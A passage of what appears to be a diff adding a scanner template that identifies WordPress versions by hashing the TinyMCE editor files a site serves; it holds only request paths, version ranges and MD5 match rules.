"(\"092b023d8d0073b8f651a92a1f711ccd\" == md5(body))" + - type: dsl + name: 2.6 - 3.0.6 + dsl: + - "(\"e893a1f9e0c9c6240ba28756cf838f5f\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"79fd242f30fe7c067cdd1a2819286d96\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/shortcuts.htm" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"9c5c4d7c3345923401c87d000c16fffc\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"f938d4898b708a597605e6fa94e09f98\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"76ce06e62540684000cc9c46aae4474f\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"27719aba1a5b5cd66f21dc6396db11c8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/editor_template_src.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"ebe2e88379da04870256a02af4d11660\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"682e22af10a0275e385f6ea70edca5ec\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/js/about.js" + matchers: + - type: dsl + name: 3.2 - 3.8.35 + dsl: + - "(\"4ae895d8be28f8b94dd4f5d206cd7d59\" == md5(body))" + - type: dsl + name: 2.7 - 3.1.4 + dsl: + - "(\"cd4f25e57d9c7c3c5eaed2b4234c8787\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"fb6dfda2a5bbf17d943427a5d18f2f95\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/js/charmap.js" + matchers: + - type: dsl + name: 3.4 - 3.8.35 + dsl: + - "(\"23e6f0fdded2c9fd69ba1fd7d69f559a\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"dd98a4a6232979fcc260e47ca0dc831c\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"f816574961189f44e338076169d21d1f\" == md5(body))" + - type: dsl + name: 2.5 - 3.0.6 + dsl: + - "(\"27f30d99721bd0ff665a443c49a22702\" == md5(body))" + - method: GET + 
path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/js/color_picker.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"cfc0f59a846661e748cae1c0adca77dc\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"dabce3953a51e33865ec851680ef8e66\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"f2be5a5b4fa75f5024b4da7c48b6220a\" == md5(body))" + - type: dsl + name: 2.6 - 3.1.4 + dsl: + - "(\"2ce934aa3086cba10c51c6d055177f8f\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"a070e37ba9fa90f524d7ba237b075ff9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/js/source_editor.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"2a9abbfa6e2ade2906839928c6728d0a\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"f1199e7f280cb16315ce96b57c132b46\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"fc7ac5c28594efaaf39bcf1ddadd9856\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"cd02d9651fd1f076f4ac5d7d7961bd58\" == md5(body))" + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"4b3abeb1908bef7872238e184a5a40d9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/js/anchor.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"f69b824ff2b94f22713614c2dc5992e0\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"4a93a690b2394eb2a6c9d2cdda9c3724\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"7da0063f892dbbfe65fce99c5a31092a\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"fda96d6d56eefb394e13c1bc1cb8619d\" == md5(body))" + - type: dsl + name: 2.5 - 3.0.6 + dsl: + - "(\"8988b8d83a5d753ddcb3600b976780fd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/mark_loaded_src.js" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"470585e89c34ba73b4b5b0c820847eb1\" == md5(body))" + 
- type: dsl + name: 3.4 - 3.7.35 + dsl: + - "(\"e44f09fb83377ffdc1157b458e43414f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/spellchecker/editor_plugin.js" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"629a571ee7686ace6ee7ad1181be916b\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"750c7ce89a12d3feb9581048b191b306\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"50a890efd0b000bebf8f59be18b4756e\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"bf331fd1784c21ad46d5476b9a0d2bf6\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"7b87925059f743fde748249a86023382\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"a9338da99929e597afc66c47f896f19d\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"1cb7ad26e99573dae76e9db4bf8eacae\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"0712d6f4126a024e78ae414d0f9eb26e\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"59deb149274a5e866ad189584400ea7a\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"a23620f619ed83c84c36d30ce50d888a\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"7184878c54ac0ad03d1c3991e53fc48e\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"16790290584c848e3c1661a19b5fb8dc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/spellchecker/changelog.txt" + matchers: + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"b37d71f086003790ea5bb7bb390b6514\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"47521cae14f8ff1d8f0438c4eece96dd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/spellchecker/editor_plugin_src.js" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"8b752a82741c05573b7591571a73238a\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - 
"(\"dfd90ec4732fbd422523c8264d9c6618\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"4a1ccb08ad7a42be05124e2db14dc558\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/spellchecker/img/wline.gif" + matchers: + - type: dsl + name: 2.5 - 3.8.35 + dsl: + - "(\"c136c9f8e00718a98947a21d8adbcc56\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/spellchecker/css/content.css" + matchers: + - type: dsl + name: 2.5 - 3.8.35 + dsl: + - "(\"d236d4333281b4eae7a1e2b514b691f4\" == md5(body))" + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"8d6e330ef6a597e6e4cbd34dd1142d55\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"72331b2dc8d86d4a5d735a6a81b64240\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/editor_plugin.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"e7e3089339dc85691bed70d81734accd\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"ace4ee20adc97976943071a23a644834\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"027f347c2e18dc9d6baa32a2b3b91ba3\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"55ff6649d76ef9f00ab07bd042c04080\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"48b93f5e8a259e79260d20c0f058c3e4\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"96c894139b58313c7db685343689df3e\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"e203448d1abcf685301d3f6a24251ced\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"5b145b1c56b55c90b4aea900fce25880\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"cf113c3a5323ea17b16af7793a8044bf\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"c29b7af54a61d8a5fd8ad8940a952cc0\" == md5(body))" + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"01d4facd6dac7390c24b0fc432123111\" == md5(body))" + - type: dsl + name: 
2.1 - 2.1.3 + dsl: + - "(\"21ceba9d264d698cfcc0c19ca1b0552a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/editor_plugin_src.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"2a403fc1f292458b7e9a323901e9d171\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"f99e775a94ebccd2e099282fed60f79f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/js/pasteword.js" + matchers: + - type: dsl + name: 2.9 - 3.8.35 + dsl: + - "(\"10f73efbf570633989e2801d0b10de4f\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"179e37760324b39e7d41b61bc707abb3\" == md5(body))" + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"7f69babced989fb799e0f7a617441c71\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/js/pastetext.js" + matchers: + - type: dsl + name: 2.9 - 3.8.35 + dsl: + - "(\"69ba0c60f23785b0c60e56b1919e53fa\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"9db07e9a6d27f06ee292ee9d0793a725\" == md5(body))" + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"05482c276313c900e2a2b55508712b13\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpfullscreen/editor_plugin_src.js" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"c59d928618f4eb94397ba801a3c100cb\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"a5356abede54850eae9c4444bb914750\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"393aaad342ffa662acffe4b7ebd77fe1\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"9518d57cd71cab0e2e1b792c8f2e7afb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpfullscreen/css/wp-fullscreen.css" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"de3ad9d8c97491f41feaaf5d5d4d60b5\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - 
"(\"47e03ab3c3dffa3156931d74ef44d52b\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"1ce500bae8c6556682d15c05171b53ee\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"9e19bedfc3e87227a024cda58a0266f4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/img/delete-2x.png" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"fc29fcdb63500be0c6096b4621840f24\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/img/delete.png" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"6de18e0045263b20400e284eb2731939\" == md5(body))" + - type: dsl + name: 2.6 - 3.4.2 + dsl: + - "(\"748b2a72b7e2aeec7e32f3f1846b5ff9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/img/image.png" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"528e8e81d99bf63d0b7f88bdd0051d3a\" == md5(body))" + - type: dsl + name: 2.6 - 3.4.2 + dsl: + - "(\"a7a2baa789bbfef570b3c4be0a838ebd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/img/image-2x.png" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"e122da77cc3ef946e42cf76288800cba\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/css/editimage.css" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"be84c8843d5da59cde1aaa472acf86a6\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"7b6706be2029b702630f0d14ca83bdc4\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"24f7a66d3de202e80523d0d1ded072b8\" == md5(body))" + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"f3965730983a5b39b3d61af55ea2977e\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"316db36315e941a43831b726bc7cc7ad\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"3223cb47ddd88a68afddd68174432e02\" == 
md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/fullscreen/editor_plugin_src.js" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"dae63ddab5c4a9fee69fe36e4f2558a3\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"bab6098141b6550727394f2a52fb0aba\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"bd6ef90e8f4138ebb23f18b3c69b67c1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpview/editor_plugin_src.js" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"877c47e5ec852d4446782f56cd7fda90\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"fdfef23447596978a7af1c589a704bd3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/button.gif" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"19f864cb81177840dcd534df4d537ea3\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"9e911a2c3cb4720d44844ef2d1832a51\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/confirm.gif" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"1bc337a20c319e531cda6ced531827d0\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"44f1d55b14fbc66b98f3899d90611c3c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/drag.gif" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"5847788e8ae098dd7fc3bdbe1a084da6\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"c8984e70b184ca51bc427aa106c29453\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/alert.gif" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"568d4cf84413656fb72fe39d1dd60f8d\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: 
+ - "(\"56646a5e811547c8bc3d1b9790496b89\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/horizontal.gif" + matchers: + - type: dsl + name: 2.5 - 3.8.35 + dsl: + - "(\"0365e75dd4a9ad61dc98dcb641207c21\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/vertical.gif" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"0261136fac58ce77bdbd96aa0194947e\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"193884a332e91059643448ed4bde2e04\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/corners.gif" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"55298b5baaecb7e06a251db9f0a4b14c\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"2e89a17a473f0e488f3e789ce998f064\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/buttons.gif" + matchers: + - type: dsl + name: 2.5 - 3.8.35 + dsl: + - "(\"2e101a4aa637bfd16cef7e763e8c2eed\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/editor_plugin_src.js" + matchers: + - type: dsl + name: 3.4 - 3.8.35 + dsl: + - "(\"50960b97a8030fd80d582166fef4ab57\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/editor_plugin.js" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"e598b8a8f94830e55c044ee7b6dd7bf0\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"b1f0a677a64e08005a093b4049f54d53\" == md5(body))" + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"c6407f04ec80e657ba01bf5938a60faa\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/editor_plugin_src.js" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - 
"(\"76bd5bbf6dd69ef9a02cf6c0ed45453d\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"bfcceea9af0abd6cca120cbdd76af2f2\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"0c8c4f07f089e8ae86166ab16201cda9\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"9dd84d5a159ba243f18568c223a534b6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/editor_plugin_src.js" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"90e1aaca98ff9c022b8b92e5a4f95c60\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"a6438b9df6aa7af17ad9c1ca2019d014\" == md5(body))" + - type: dsl + name: 3.4 - 3.5.2 + dsl: + - "(\"48784cf4970b78b03ce5d6da9cac5621\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/js/popup.js" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"6ceb647592588bcf463befd9408e27ad\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"6ec150b7987caaef98b59c87b9f471be\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"ed402838f592c94f7193ea14f8b6080d\" == md5(body))" + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"a38ac5266924938a4ff5514369c6b40d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/js/wpdialog.min.js" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"11c54c73d65807fda84de489cc293213\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"6f509c02257266b9ae4b7686b348b6e9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/js/wpdialog.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"a385e127675754d68ba3ee7f2e52000c\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"5839f864d7d49087233bd5d757c1dce0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/js/popup.min.js" + 
matchers: + - type: dsl + name: 3.7 - 3.8.33 + dsl: + - "(\"63b0aed9b02f879a6e0295fbea7db854\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"a38ac5266924938a4ff5514369c6b40d\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.8.35 + dsl: + - "(\"e66d35d1f2662ffef10de09a788a5ac1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/editor_plugin_src.js" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"4c0617745b1e12ce03667fa18ab4653f\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"1b2c3742258f2159bfe1c3d5bd3c3d25\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"e61dbbc27d24dcdf7dd27875920e202d\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"c0e1697f5027204a9a8409f4048a1150\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/img/edit.png" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"42a45087214d7c886a308fd83406d60d\" == md5(body))" + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"9554f2aa129d2d01e247a73669bb832d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/img/delete-2x.png" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"fc29fcdb63500be0c6096b4621840f24\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/img/t.gif" + matchers: + - type: dsl + name: 2.7 - 3.8.35 + dsl: + - "(\"12bf9e19374920de3146a64775f46a5e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/img/delete.png" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"6de18e0045263b20400e284eb2731939\" == md5(body))" + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"748b2a72b7e2aeec7e32f3f1846b5ff9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/img/edit-2x.png" + matchers: + - type: dsl + name: 3.5 - 
3.8.35 + dsl: + - "(\"55706c78fac741908045b68213df637f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/editor_plugin_src.js" + matchers: + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"3f0d7eef1ba22024488ddffcb3bb0e55\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"30d8cd0fe92587476fab267f2598ad7d\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"0a4a9b17e7640d4a0b7ed0b1404c89da\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/css/media.css" + matchers: + - type: dsl + name: 3.2 - 3.8.35 + dsl: + - "(\"4e29dd1bf318a62f0b5d39dc610e5f82\" == md5(body))" + - type: dsl + name: 2.6 - 3.0.6 + dsl: + - "(\"51795abbefc981b9f77083afd672a495\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"05c0940b9d0db9e52175d4b2e3b330c2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/js/embed.js" + matchers: + - type: dsl + name: 2.5 - 3.8.35 + dsl: + - "(\"5df3783492b848adde42124a1e9cf383\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/js/media.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"1c9dba9ba82579d5e865bbd33e325354\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"2dccc8818dffd06a3a234f0bc52135b4\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"1303c105ad0a1ce44c27e106825a3eda\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"ebb309bfaa19a8b3c0e9051cc3e73df9\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"cac808d6007f1003b334e315f01ceec6\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"1e782a443c073b57897597a0720e2a82\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"7f564d3939db8324b11699de512a1562\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"d753adf6dd8922ef62944d3daf3f93c7\" == md5(body))" + - method: GET 
+ path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/tabfocus/editor_plugin.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"d3e5ef7a1a203516af0d8fdf94952fd2\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"dccf6d391c252e2571f2ed4b15fba889\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"2993514e91cbf86c13ba3ca12b7a19e0\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"15397ee0ab8280702de894ed2c8e9e40\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"1a8e22759ea3340a010af52f4210a26e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/tabfocus/editor_plugin_src.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"12889ccf8caf1d466859ba949f52fbca\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"8cf50fd7b506d6ee501f58d19c68eedf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/directionality/editor_plugin.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"e2d925fe1e778dbcade06d55164fc276\" == md5(body))" + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"653c3a89058b610fd12242faf4f01cdf\" == md5(body))" + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"7713d6e3e2531ea5047b4e2532448d43\" == md5(body))" + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"7877f482e6df41494a9e0ae82c6bd33c\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"d05c4cbac3ecae620c904462a43774ed\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"15016a76dc405fe716a2cce3ea67e0f5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/directionality/editor_plugin_src.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"9da7f763c6a1f1b7fc61582e7d454cc3\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"7a8992f2005bd63d97c151edb2d67ce9\" == md5(body))" + - method: GET + path: + - 
